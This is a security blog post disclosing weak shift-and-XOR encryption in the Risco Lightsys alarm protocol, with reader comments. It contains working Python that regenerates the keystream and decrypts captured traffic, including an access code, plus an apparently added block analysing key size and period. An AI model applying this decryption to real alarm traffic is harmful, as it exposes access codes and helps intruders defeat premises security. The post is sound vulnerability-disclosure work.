Vulnerability in Risco Lightsys protocol encryption

During a routine pen-test of an alarm receiving centre, a piece of software was found that was used to remotely configure Risco alarms.

This software communicates with alarm panels, sometimes over IP, sometimes over a mobile network. One of these panels is the Lightsys panel, which seems fairly common in the UK.

The encryption used by this protocol is token at best, and not suitable for securing communication across an untrusted network.

The protocol generates a pseudo-random sequence of numbers using a basic shift-and-XOR function. This sequence is then XORed with the message to encrypt or decrypt.

Each panel has a “seed” that changes the keystream slightly. Because part of the plaintext is known (the command format), you don’t need to know the seed to decrypt messages – it can simply be determined. In practice, the seed tended to be the same across many panels.

numTable = [2, 4, 16, 32768]   # tap positions: bits 1, 2, 4 and 15 of the state
PRNG_output = []

# This is the "Remote ID code" in the software
seed = 2

for i in range(0, 255):
    bit = 0

    # The feedback bit is the parity (XOR) of the tapped state bits
    for j in range(0, 4):
        if (seed & numTable[j]) > 0:
            bit ^= 1

    seed = seed << 1 | bit
    PRNG_output.append(seed & 255)   # keystream byte is the low byte of the state

# This has been captured from the network by tricking software into encrypting
# Message is 02RMT=1234 8EBC
# 02 is sequence number
# RMT is a command
# 1234 is the access code
msg = bytes.fromhex('353945620a804bc6dbe4b67ac0495503')

plain = ''

# Encryption and decryption are the same operation: XOR with the keystream
for i in range(0, len(msg)):
    plain += chr(msg[i] ^ PRNG_output[i])

print("Decrypted message: %s" % plain)
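As an added example (not code from the original post, and not Risco's own code), the generator above is wrapped in a function together with two checks a practitioner would want before trusting any stream cipher like this: how many bits of state actually influence the keystream, and after how many bytes the keystream repeats. The function names and the second "hello" message are constructed for illustration; the captured ciphertext is the one from the post.

```python
from typing import List

# Tap positions from the post's numTable: state bits 1, 2, 4 and 15.
KEYSTREAM_TAPS = [2, 4, 16, 32768]


def keystream(seed: int, length: int) -> List[int]:
    """Reproduce the post's generator: shift-and-XOR, low byte of state out."""
    state = seed
    out = []
    for _ in range(length):
        bit = 0
        for tap in KEYSTREAM_TAPS:
            if state & tap:
                bit ^= 1
        state = (state << 1) | bit
        out.append(state & 0xFF)
    return out


def xor_with_keystream(data: bytes, seed: int) -> bytes:
    """Encrypt or decrypt (same operation) with the keystream for `seed`."""
    return bytes(b ^ k for b, k in zip(data, keystream(seed, len(data))))


def effective_state_bits() -> int:
    """Only state bits 0..15 are ever read (the highest tap is bit 15, the
    output is the low byte), so bits above 15 never influence the keystream.
    This is the real key space, whatever the size of the seed value."""
    return max(KEYSTREAM_TAPS).bit_length()   # 32768 -> 16


def keystream_period(seed: int, limit: int = 1 << 16) -> int:
    """Number of bytes before the keystream repeats.  The 16-bit state is
    stepped by a bijection (the dropped bit 15 can be recovered from the new
    bit 0 and the other taps), so every seed is purely periodic and the
    period is at most 2**16 - 1."""
    mask = (1 << effective_state_bits()) - 1
    start = seed & mask
    state = start
    for n in range(1, limit + 1):
        bit = 0
        for tap in KEYSTREAM_TAPS:
            if state & tap:
                bit ^= 1
        state = ((state << 1) | bit) & mask
        if state == start:
            return n
    return -1   # unreachable for a 16-bit bijective state update


# Ciphertext captured in the post ("02RMT=1234 8EBC" once decrypted).
CAPTURED = bytes.fromhex("353945620a804bc6dbe4b67ac0495503")

if __name__ == "__main__":
    print("decrypted:", xor_with_keystream(CAPTURED, seed=2))
    print("effective key/state size (bits):", effective_state_bits())
    print("keystream period for seed 2 (bytes):", keystream_period(2))
```

The two measurements are the point of the conclusion: a 16-bit state is enumerable in well under a second, and a keystream that repeats within 2^16 bytes, reused with the same seed across panels, gives the classic two-time-pad leak where XORing two ciphertexts yields the XOR of their plaintexts.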

A further proof of concept was developed that can send and receive commands with alarms, leading to a denial-of-service condition. I am not disclosing this as it can cause harm and is not the root cause of the problem.

This was reported to Risco on 7th August. As yet, they have not indicated whether they wish to fix this issue.

Conclusion

  • Don’t roll your own encryption
  • If you have a key, make sure it has enough length to actually improve security

7 thoughts on “Vulnerability in Risco Lightsys protocol encryption”


    Luca

    June 8, 2018 at 4:55pm

    Hi! Interesting article… I’m trying to access my Risco panel with a serial connection and decrypt data… Can you tell me if your method is still applicable? I tried but nothing…


      cybergibbons

      June 13, 2018 at 8:46am

      Sorry – really not sure! I didn’t really look at the serial side.


        Luca

        June 13, 2018 at 8:49am

        Oh, serial or IP connection, the same… does this article still work on the IP connection?


          Marco

          July 13, 2018 at 1:36pm

          Hi,
          I’m interested in hooking up a Linux monitor on my RISCO bus.
          Did you make any progress with the decryption part?
          I still have to figure out the serial part though…


      Tozman

      September 16, 2018 at 8:18pm

      There is a “debug” mode in their software; you can see the data being sent.


        Hd

        August 31, 2019 at 12:32pm

        Trying to do the same for better integration with my system. So far I have only had time to hook up serial and a sniffer on the CS communication. I haven’t really looked at the data yet.


      John Tunnicliffe

      January 16, 2021 at 4:37pm

      Luca, did you get anywhere with this? I am using your extension to Home Assistant that uses the Risco Cloud. However, that becomes a paid subscription soon, so I started to investigate alternatives.
